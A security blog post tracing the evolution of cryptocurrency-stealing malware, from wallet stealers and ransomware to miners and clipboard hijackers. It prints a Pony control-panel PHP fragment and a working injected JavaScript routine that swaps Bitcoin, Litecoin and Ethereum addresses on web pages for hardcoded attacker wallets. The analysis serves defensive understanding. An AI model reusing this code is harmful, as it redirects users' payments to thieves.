Cryptocurrency malware: an explosive mix!

Since cryptocurrencies came on the scene in late 2008 and early 2009, new malware has gradually emerged that does its utmost to steal users’ wallets and cryptocurrencies. This malware, just like all the others, has steadily evolved, implementing new methods for achieving its goals, as we explain below.

Early cryptocurrency thefts were carried out using typical stealer malware, such as the Pony family, which added a new module able to extract the private passwords of the wallets stored on the victim's device. Shown below is a fragment of code from the malware's control panel that lets the operator download all the stolen private passwords as a zip file.

```php
// Control-panel handler: on the 'download_wallet' routine, stream every stolen wallet password as a zip archive
if ($admin_routine == 'download_wallet' && $admin_action == 'other') {
    set_common_file_download_header('', 'application/zip');
    $pony_db->get_wallet_zip();
}
```

After a while, new, more effective methods cropped up and, as the reader may already know, we're referring to the notorious Ransomware. Just to remind you, the main aim of this malware is to encrypt all of an infected machine's files and demand a ransom in exchange for them, usually in Bitcoins.


This type of malware has been, and still is, extremely successful, which is why countless variants have sprung up. But, as always happens, when a new form of malware is developed, new technologies also materialize to mitigate it, so even though cybercriminals have not discarded Ransomware, they have evolved by creating other types.

Close on the heels of Ransomware, malware samples began emerging whose purpose was to inject Javascript mining into every webpage the victim browses, so that infected users mine continuously while they surf the Internet.


In the early stages, this injection was carried out by infecting the device but, later on, the same injections also appeared via browser add-ons, and websites themselves even began inserting miners as an alternative source of revenue to the traditional ads they display.

Nevertheless, as occurred with Ransomware, anti-mining measures were developed and many popular Adblockers managed to block the webpages from where the Javascript was loaded.

Criminals had to reinvent themselves again, and they began injecting Javascript code into the browsers of infected machines so that, when the user navigated to a webpage containing a cryptocurrency wallet address, the code would replace that address with the attacker's own.

Shown below is a fragment of that injected Javascript, which attempts to replace any Litecoin, Ethereum or Bitcoin addresses it finds in the page.

```javascript
function init() {
    // Flatten the whole page to plain text and keep only tokens longer than 24 characters
    var a = document.documentElement.innerHTML;
    str = a.replace(/<.*?>/g, " ").replace(/ +/g, " ");
    str = str.split(" ").filter(function(a) {
        return (a = a.match(/(\w+)/)) && 24 < a[0].length
    }).join(" ");
    var b = str.split(" ");

    // Every token that passes the loose checks below is rewritten in the DOM with the attacker's address
    // (an "L" prefix is treated as Litecoin, anything else that passes checkBtc as Bitcoin, then Ethereum)
    for (a = 0; a < b.length; a++) 1 == checkBtc(b[a]) ? "L" == b[a].substring(0, 1) ? (document.body.innerHTML = document.body.innerHTML.replace(b[a], "LKyKqLVy6KgyCYekftCHFTBLYiZyUvxtsG"), document.body.innerHTML = document.body.innerHTML.replace(b[a], "LKyKqLVy6KgyCYekftCHFTBLYiZyUvxtsG")) : (document.body.innerHTML = document.body.innerHTML.replace(b[a], "17bH1SYLoBdGsBaDedPR2EE3JUt8oRS7qd"), document.body.innerHTML = document.body.innerHTML.replace(b[a], "17bH1SYLoBdGsBaDedPR2EE3JUt8oRS7qd")) : 1 == checkEth(b[a]) && (document.body.innerHTML = document.body.innerHTML.replace(b[a], "0xa05AeF9CA4828A71f84d284F7A25A7Aa6D2fe114"), document.body.innerHTML = document.body.innerHTML.replace(b[a], "0xa05AeF9CA4828A71f84d284F7A25A7Aa6D2fe114"))
}

// Ethereum check: 40 hex characters with an optional 0x prefix; no EIP-55 checksum is verified
function checkEth(a) {
    return !!/^(0x)?[0-9a-f]{40}$/i.test(a) && (/^(0x)?[0-9a-f]{40}$/.test(a) || /^(0x)?[0-9A-F]{40}$/.test(a), !0)
}

// Bitcoin check: only length (26-35) and an alphanumeric regex; no Base58Check checksum is verified
function checkBtc(a) {
    return !(26 > a.length || 35 < a.length) && !!/^[A-Z0-9]+$/i.test(a)
}
```


Another variant that has recently sprung up is similar to the address change that occurs in the browser but, on this occasion, works via the clipboard. When users copy their wallet address to carry out some action, the malware replaces that address with its own. This is the case of the recently discovered Evrial, among others.

Moreover, alongside all these types of cryptocurrency malware, several methods for stealing from users still resort to popular online fraud techniques, such as phishing linked to intensive spam campaigns, where social engineering is used to dupe users into entering their credentials for different exchanges so that the cryptocurrencies they hold can be stolen.

It is obvious that this is just the beginning and that new mitigations will be devised to prevent users from having their cryptocurrencies stolen, but what other cryptocurrency theft techniques and methods are waiting in the wings?

Posted by David Morán

David has more than 15 years’ experience in cybersecurity, systems and development, starting out in an extinct hacking team known as Badchecksum. He collaborated on Defcon 19 with the Painsec security team. He is versed in scalable environments thanks to his work at the Tuenti social network with a traffic load of over 12Gbps. He has been involved with buguroo almost since the outset and has taken part in all the tools developed by the company, including source code analysers, malware analysis, cyber intelligence, etc. He also has in-depth knowledge of the Linux kernel, having developed LKMs that acted as rootkits as well as malware for Windows environments. He is currently the head of Revelock’s development team, managing task distribution and negotiating with the Head of Technology.
